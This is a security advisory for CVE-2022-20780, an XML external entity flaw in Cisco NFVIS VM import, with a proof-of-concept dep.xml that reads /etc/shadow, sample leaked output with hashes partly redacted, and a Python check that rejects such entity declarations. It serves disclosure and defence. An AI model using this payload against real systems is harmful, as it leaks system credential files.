
Cisco Enterprise NFVIS - XML External Entity Injection Vulnerability (CVE-2022-20780)

High
orange-cert-cc published GHSA-hrpq-384f-vrpg May 6, 2022

Package

NFVIS (Cisco)

Affected versions

4.5.1-FC2

Patched versions

4.7.1

Description

Overview

ENCS has the capability to export VMs. When the vmExportAction command is requested, the VM's configuration and metadata are compressed together with the VM image into a .vmbkp archive.
The vmImportAction command is also available, allowing .vmbkp archives to be imported.

This import is vulnerable to an XXE that allows system data to be leaked to the CLI and probably to the VM.

Details

The vmImportAction expects a .vmbkp archive. This archive is a simple .tar.gz.
It has to be composed of several files, one of them being dep.xml.

dep.xml is an XML configuration file describing the vm_lifecycle.

An attacker can add an external entity declaration to this XML file. This external entity will be resolved by the EncsManager.

Proof of Concept

In this example we inject the external entity in a variable field of a vm_group that should be resolved with /etc/shadow file.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>
<vm_lifecycle xmlns="http://www.cisco.com/nfvis/vm_lifecycle">
  <tenants>
    <tenant>
      <name>admin</name>
      <deployments>
        <deployment>
          <name>ubuntu1</name>
          <vm_group>
            <name>ubuntu1</name>
            ...
            <config_data>
              ...
              <configuration>
                <dst>user-data</dst>
                ...
                <variable>
                  <name>xxe</name>
                  <val>&xxe;</val>
                </variable>
              </configuration>
            </config_data>
          </vm_group>
        </deployment>
      </deployments>
    </tenant>
  </tenants>
</vm_lifecycle>

It results in /etc/shadow content being displayed in the configuration file.

encs-audit-n# show running-config vm_lifecycle tenants tenant admin deployments deployment ubuntu1 vm_group ubuntu1 config_data configuration variable xxe     
vm_lifecycle tenants tenant admin
 deployments deployment ubuntu1
  vm_group ubuntu1
   config_data configuration user-data
    variable xxe
     val [ "root:$6$TqVe9rHRx8kkXfb$<REDACTED>:18820:0:99999:7:::\nbin:*:18527:0:99999:7:::\ndaemon:*:18527:0:99999:7:::\nadm:*:18527:0:99999:7:::\nlp:*:18527:0:99999:7:::\nsync:*:18527:0:99999:7:::\nshutdown:*:18527:0:99999:7:::\nhalt:*:18527:0:99999:7:::\nmail:*:18527:0:99999:7:::\noperator:*:18527:0:99999:7:::\ngames:*:18527:0:99999:7:::\nftp:*:18527:0:99999:7:::\nnobody:*:18527:0:99999:7:::\nnginx:!!:18820::::::\nsystemd-network:!!:18820::::::\ndbus:!!:18820::::::\npolkitd:!!:18820::::::\nunbound:!!:18820::::::\nrpc:!!:18820:0:99999:7:::\ntss:!!:18820::::::\nqemu:!!:18820::::::\nsaslauth:!!:18820::::::\nopenvswitch:!!:18820::::::\nsshd:!!:18820::::::\ngeoclue:!!:18820::::::\nntp:!!:18820::::::\nchrony:!!:18820::::::\nrpcuser:!!:18820::::::\nnfsnobody:!!:18820::::::\nconsole:!!:18820:0:99999:7:::\ngluster:!!:18820::::::\nradvd:!!:18820::::::\nldap:!!:18820::::::\ndockerroot:!!:18820::::::\ntomcat:!!:18820::::::\npostgres:!!:18820::::::\ntcpdump:!!:18820::::::\npostfix:!!:18820::::::\nbird:!!:18820::::::\nadmin:$6$W56YPo/BPFohgh97$<REDACTED>:18820:0:99999:7:::\n" ]
    !
   !
  !
 !
!

Solution

Security patch

Upgrade to Cisco Enterprise NFVIS v4.7.1

Workaround

We recommend disabling external entity resolution in the XML parser.
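As an added illustration of that workaround (example code written for this page, not Cisco's or the NFVIS code base), the loader below refuses any dep.xml that carries a DOCTYPE or entity declaration before a single entity can be resolved, then reads the vm_group variables with the vm_lifecycle namespace from the advisory. The sample documents are constructed; the field names beyond those shown in the Proof of Concept are assumptions.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET

NS = {"nfv": "http://www.cisco.com/nfvis/vm_lifecycle"}  # namespace from the advisory's dep.xml


class UnsafeXmlError(ValueError):
    """Raised when dep.xml carries a DTD or an entity declaration."""


def reject_dtd(xml_bytes: bytes) -> None:
    """Pre-parse pass with expat: fail on the DOCTYPE itself, before any entity exists."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError(f"DOCTYPE '{name}' is not allowed in dep.xml")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXmlError(f"entity declaration '{name}' is not allowed in dep.xml")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    # Defence in depth: never fetch an external entity even if one were declared.
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    parser.Parse(xml_bytes, True)  # exceptions raised in the handlers propagate out


def extract_variables(xml_bytes: bytes) -> dict:
    """Return {variable name: val} for every <variable> in a validated dep.xml."""
    reject_dtd(xml_bytes)
    root = ET.fromstring(xml_bytes)
    return {v.findtext("nfv:name", namespaces=NS): v.findtext("nfv:val", namespaces=NS)
            for v in root.iterfind(".//nfv:variable", NS)}


def dep_xml_is_safe(xml_bytes: bytes) -> bool:
    try:
        reject_dtd(xml_bytes)
        return True
    except UnsafeXmlError:
        return False


# Constructed benign dep.xml, shaped like the advisory's PoC without the DTD.
BENIGN_DEP_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<vm_lifecycle xmlns="http://www.cisco.com/nfvis/vm_lifecycle">
  <tenants><tenant><name>admin</name><deployments><deployment><name>ubuntu1</name>
    <vm_group><name>ubuntu1</name><config_data><configuration><dst>user-data</dst>
      <variable><name>hostname</name><val>ubuntu1</val></variable>
    </configuration></config_data></vm_group>
  </deployment></deployments></tenant></tenants>
</vm_lifecycle>"""

# Same document with the advisory's external entity declaration and reference added.
XXE_DEP_XML = (b'<?xml version="1.0"?>\n<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>\n'
               + BENIGN_DEP_XML.split(b"\n", 1)[1].replace(b"<val>ubuntu1</val>", b"<val>&xxe;</val>"))
```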

References

https://nvd.nist.gov/vuln/detail/CVE-2022-20780
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-NFVIS-MUL-7DySRX9

Credits

Orange CERT-CC
Cyrille CHATRAS at Orange group
Loic RESTOUX at Orange group
Pierre DENOUEL at Orange group

Timeline

Date reported: September 16, 2021
Date fixed: May 4, 2022

Severity

High


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVE ID

CVE-2022-20780

Weaknesses